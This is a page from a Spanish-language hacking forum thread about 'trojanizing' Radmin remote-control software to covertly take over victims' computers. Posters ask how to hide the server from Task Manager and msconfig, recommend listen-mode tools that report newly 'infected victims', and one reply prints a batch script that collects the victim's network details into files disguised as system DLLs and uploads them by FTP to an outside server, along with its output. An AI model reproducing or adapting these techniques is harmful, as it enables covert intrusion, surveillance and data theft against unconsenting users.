elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Troyanizando Radmin 2.1 control remoto
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 Ir Abajo Respuesta Imprimir
Autor Tema: Troyanizando Radmin 2.1 control remoto  (Leído 158,993 veces)
carlipus


Desconectado Desconectado

Mensajes: 358


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #70 en: 21 Septiembre 2005, 21:11 pm »

Si no te entendido mal, es si no se puede configurar desde Telnet remotamente, configurarlo por http, pues si el puerto 80 está abierto, tan solo tendrías que poner en tu explorador de Internet, http://IP
Es igual que cuando accedes a tu Router a través de http.
Y hay te saldrá contraseña y password del Router, y entras, por Http, resulta más fácil configurar.

Saludos
« Última modificación: 21 Septiembre 2005, 21:13 pm por carlipus » En línea

Zool

Desconectado Desconectado

Mensajes: 18


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #71 en: 23 Septiembre 2005, 12:18 pm »

Muchas Gracias Carlipus, me sacaste la duda  ;D
En línea

carlipus


Desconectado Desconectado

Mensajes: 358


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #72 en: 23 Septiembre 2005, 13:46 pm »

De nada!

Saludos!
En línea

scar_face

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #73 en: 17 Octubre 2005, 04:34 am »

Hola a todos y gracias por acernos la vida asi de simple jeje, pero.... como podria hacer para q el r_server aparezca como aplicacion de sistema y no como aplicacion de usuario en el administrador de tareas por q asi solo le dan matar proceso y chau conexión, y tambien como hacer para q no aparezca en el msconfig el inicio de nc y del radmin server camuflageado, si alguien tiene alguna sugerencia o algun material para ilustrarme en este asunto por favor publicarlo aqui asi no sea yo solamente el beneficiado si no todos lo lectores de este foro ok.
Weno un saludo a todos y hasta la proxima.
En línea

tRekU

Desconectado Desconectado

Mensajes: 258


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #74 en: 17 Octubre 2005, 20:54 pm »

xdd

Pues no he leido el hilo, pero si has seguido los pasos, el radmin se te habra instalado como servicio en la makina en cuestion, lo que quiere decir que en el proximo reinicio sera lanzado como system..

Salu2

P.D.: Anelkaos (Ocultar Remote Administrator 2.1 de la lista de servicios). Rootkit, se que se puede cambiar el nombre pues alguno me encontrao pero a saber, tocando el registro imagino que se podra igual .. pero amos .. root, y adios proceso, servicio y puerto .. XDD
En línea

leprox

Desconectado Desconectado

Mensajes: 5


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #75 en: 26 Octubre 2005, 00:25 am »

Para saltear los routers/gateways ,lo mejor es usar VNC en "listen mode" donde el puerto "escucha" es el nuestro y no el de la victima , por ende nos vamos a poder conectar donde queramos.
Otra opcion es el Remote Anything , el cual mediante una herramienta que se llama "directory server" nos va actualizando todas las victimas que se van infectando , de la misma forma que el vnc , en mode "listen" donde la conexion la establecen ellos hacia nosotros en el momento que ejecutan el server. yo lo uso , y no necesito reverse shell , netcat , ni nada para saltear fierewalls , es MUY recomendable.
En línea

ibiza-tdi

Desconectado Desconectado

Mensajes: 3



Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #76 en: 12 Noviembre 2005, 23:45 pm »

K onda;
Oigan hize el tutorial al pie de la letra...Ya la victima tiene guardado todos los arhivos...Pero al intenar conectarme con ella Me dice k el Password es incorrecto...Y cheque el .bat y todo esta bien para k el password sea 123456 k pasara?

Saludos
Ibiza-Tdi... 8)
En línea

CoMpEtItIoN RuNs In OuR GeNeS AnD ThE HuNt FoR a MaTe HaS AlWaYs BeEn ThE UltImAtE FoRm Of CoMpEtItIoN
Paya_pollo

Desconectado Desconectado

Mensajes: 4


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #77 en: 18 Noviembre 2005, 23:28 pm »

hola a todo el mundo, gran tutorial por cierto, pero alguien sabe como quitar una proteccion que tiene el messenger, que borra el archivo automáticamente?, Gracias
En línea

debion

Desconectado Desconectado

Mensajes: 104


Debion Networks


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #78 en: 31 Enero 2006, 13:34 pm »

Buenas a todos,

he estado intentando troyanizar el radmin 2.2 , programando y compilando un archivo en C q ejecute unas instrucciones en cmd.exe .

El caso es q ésta nueva versión de radmin no incluye la opción de introducir la pass durante la instalación por línea de comandos.

Probando en una LAN he conseguido todo menos colocar un password imprescindible para conectarme al remoto.

Saben de qué manera podría incluir la pass en la instalación desde la línea de comandos y, si es posible, activar la opción HIDE para q desaparezca de la barra de herramientas ?

Gracias por anticipado y un saludo.

PD: Gracias a todos los q dia a dia colaboran en ésta web que tanto nos enseñan a principiantes informáticos como yo, facilitandonos en todos los casos la manera de aprender y comprender todo el entorno.

En línea

Venerato et erit veneratum
firewer

Desconectado Desconectado

Mensajes: 120


Ver Perfil
Re: Troyanizando Radmin 2.1 control remoto
« Respuesta #79 en: 17 Febrero 2006, 19:58 pm »

Buenas he probado el siguiente codigo de la pagina 2 y me sale un error que no logro resolver.

@echo off
echo configuracion del sistema de la victima >C:\WINDOWS\system32\win32ip.dll
arp -a >>C:\WINDOWS\system32\win32ip.dll
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll
echo firewer >>C:\WINDOWS\system32\Win32el.dll
echo mipassword >>C:\WINDOWS\system32\Win32el.dll
echo put C:\WINDOWS\system32\win32ip.dll victima.txt >>C:\WINDOWS\system32\Win32el.dll
echo QUIT >>C:\WINDOWS\system32\Win32el.dll
ftp -s:C:\WINDOWS\system32\Win32el.dll ftp.usuarios.lycos.es


Me devuelve lo siguiente: (el pass y el usuario q pongo son correctos)

Conectado a ftp.usuarios.lycos.es.
220 212.78.204.234 FTP server ready
Usuario (ftp.usuarios.lycos.es:(none)):
331 Password required for firewer.

530 Login incorrect.
Error al iniciar la sesión.
ftp> put C:\WINDOWS\system32\win32ip.dll victima.txt
530 Please login with USER and PASS
530 Please login with USER and PASS
ftp> QUIT
221 Goodbye.

Ai algo mal?

Por cierto esto:
ipconfig /all >>C:\WINDOWS\system32\win32ip.dll

Solo da la ip privada del pc, como se hace para la ip publica?
« Última modificación: 17 Febrero 2006, 20:08 pm por firewer » En línea

Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines